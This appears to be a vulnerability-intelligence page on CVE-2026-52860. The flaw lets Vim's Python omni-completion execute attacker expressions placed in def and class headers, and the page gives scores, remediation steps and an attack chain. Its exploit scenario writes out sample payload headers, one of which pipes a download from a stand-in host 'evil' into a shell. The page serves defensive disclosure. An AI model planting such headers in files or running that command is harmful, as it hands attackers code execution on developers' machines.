Which versions of Vim are affected by CVE-2026-52860?

Vim versions prior to 9.2.0597 contain a code execution vulnerability triggered through the Python omni-completion feature, allowing attackers to execute arbitrary Python code when developers open…. A patch is available.

How to fix or mitigate CVE-2026-52860?

24 hours: Audit Vim installations and Python omni-completion usage across development teams. 7 days: Disable Python omni-completion in Vim configuration files (`:set omnifunc=` or remove pythoncomplete) for all affected users, or restrict to trusted internal codebases only; subscribe to Vim security advisories for patch notification. 30 days: Upgrade to Vim 9.2.0597 or later when vendor releases the patch, or transition development environments to alternative editors if Vim remains unpatched beyond acceptable risk window.

Vim CVE-2026-52860

Q: What is the CVSS score of CVE-2026-52860?

CVE-2026-52860 has a CVSS 4.0 base score of 7.5 (High). CVSS vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

EUVD-2026-36285 HIGH

Code Injection (CWE-94)

2026-06-11 GitHub_M

Python Code Injection RCE

7.5

CVSS 4.0 · Vendor: GitHub_M

Severity by source

Vendor (GitHub_M) PRIMARY

7.5 HIGH

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

vuln.today AI

7.8 HIGH

Exploitation requires the victim to open a local malicious file and actively invoke omni-completion, so AV:L and UI:R; no auth needed (PR:N) and full code execution gives C/I/A:H.

3.1 AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

4.0 AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Network

Attack Complexity

Low

Privileges Required

None

User Interaction

Scope

Lifecycle Timeline

Patch available

Jun 11, 2026 - 20:01 EUVD

Source Code Evidence Fetched

Jun 11, 2026 - 19:22 vuln.today

Analysis Generated

Jun 11, 2026 - 19:22 vuln.today

DescriptionCVE.org

Vim is an open source, command line text editor. Prior to version 9.2.0597, Vim's Python omni-completion executes reconstructed function and class definitions from the current buffer with exec() as part of populating the completion dictionary. Python evaluates function default values, parameter annotations, and class base expressions at definition time, so a hostile buffer can execute attacker-controlled Python expressions during omni-completion. The existing g:pythoncomplete_allow_import mitigation (GHSA-52mc-rq6p-rc7c) does not cover this path, because the attacker-controlled code is not a harvested import/from statement. This issue has been patched in version 9.2.0597.

Articles & Coverage 1

News 6 New Python Vulnerabilities - 1 Critical, 5 High, 3 With POC Jun 12, 2026

AnalysisAI

Arbitrary Python code execution in Vim prior to 9.2.0597 occurs when a user triggers Python omni-completion (<C-x><C-o>) on a buffer containing crafted def or class headers, because the pythoncomplete autoload reconstructs definitions and runs them through exec(), which evaluates default values, annotations, and base-class expressions at definition time. The earlier g:pythoncomplete_allow_import mitigation (GHSA-52mc-rq6p-rc7c) does not cover this sink. …

Unlock full vulnerability intelligence

Risk assessment & exploitation conditions
Attack chain visualization
Remediation with exact patch versions
Threat intelligence from 22 sources
Personal watchlist & email alerts

Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon

Craft malicious Python file with payload in def/class header

Delivery

Deliver via repo, email, or shared filesystem

Exploit

Victim opens file in Vim with Python support

Install

Victim invokes omni-completion (Ctrl-X Ctrl-O)

pythoncomplete rebuilds def/class and calls exec()

Execute

Python evaluates attacker expression at definition time

Impact

Arbitrary code runs as the editing user

Recon

Craft malicious Python file with payload in def/class header

Delivery

Deliver via repo, email, or shared filesystem

Exploit

Victim opens file in Vim with Python support

Install

Victim invokes omni-completion (Ctrl-X Ctrl-O)

pythoncomplete rebuilds def/class and calls exec()

Execute

Python evaluates attacker expression at definition time

Impact

Arbitrary code runs as the editing user

Vulnerability AssessmentAI

Exploitation	Victim must open an attacker-controlled buffer in Vim (any version before 9.2.0597) with Python support compiled in, edit a Python-filetype file, and explicitly trigger omni-completion via `<C-x><C-o>` or `:call pythoncomplete#Complete()` / `python3complete#Complete()`; the malicious payload must be placed inside a `def` parameter default value, a parameter annotation, or a class base-class expression so that `exec()` evaluates it at definition time. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment	The CVSS 4.0 vector AV:N/AC:L/AT:P/PR:N/UI:A scores 7.5 and correctly reflects the social-engineering nature: a user must open a hostile file and actively invoke Python omni-completion, so this is not wormable or driveby. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario	An attacker publishes a Python file (for example in a repository, gist, or email attachment) whose source contains a benign-looking class or function header such as `class Foo(__import__('os').system('curl evil\|sh')):` or `def bar(x=__import__('os').system('id')):`. When a developer opens the file in Vim and invokes Python omni-completion with `<C-x><C-o>`, the pythoncomplete script reconstructs and `exec()`s the header, evaluating the attacker's expression and running arbitrary code with the user's privileges.
Remediation	Vendor-released patch: Vim 9.2.0597 - upgrade to this version or later (commit c8c63673bc4253212820626aeeb75999d9a539d2), which strips default values and annotations from parameters and whitelists base-class expressions to pure dotted names before calling `exec()`; see https://github.com/vim/vim/releases/tag/v9.2.0597 and the advisory at https://github.com/vim/vim/security/advisories/GHSA-65p9-mwwx-7468. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

24 hours: Audit Vim installations and Python omni-completion usage across development teams. …

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-48039 CRITICAL Act Now POC

9.1 Jun 11

Unauthenticated remote attackers can invoke MCP tool handlers and exfiltrate the operator's long-lived Meta Graph API ac

CVE-2026-45833 CRITICAL Act Now

9.4 Jun 12

Authenticated remote code execution in ChromaDB Python project versions 0.4.17 and later enables attackers holding the U

CVE-2026-48031 CRITICAL Act Now

9.1 Jun 10

Authentication bypass in dhax/go-base Go REST API boilerplate (versions prior to commit cc82b974, merged May 17, 2026) a

CVE-2026-11393 HIGH This Week

8.8 Jun 08

Remote code execution in AWS AgentCore CLI before v0.14.2 allows authenticated attackers to inject Python code via craft

CVE-2026-20251 HIGH This Week

8.8 Jun 10

Remote code execution in Splunk Enterprise, Splunk Cloud Platform, and the Splunk Secure Gateway app allows a low-privil

CVE-2026-52860 vulnerability details – vuln.today

Back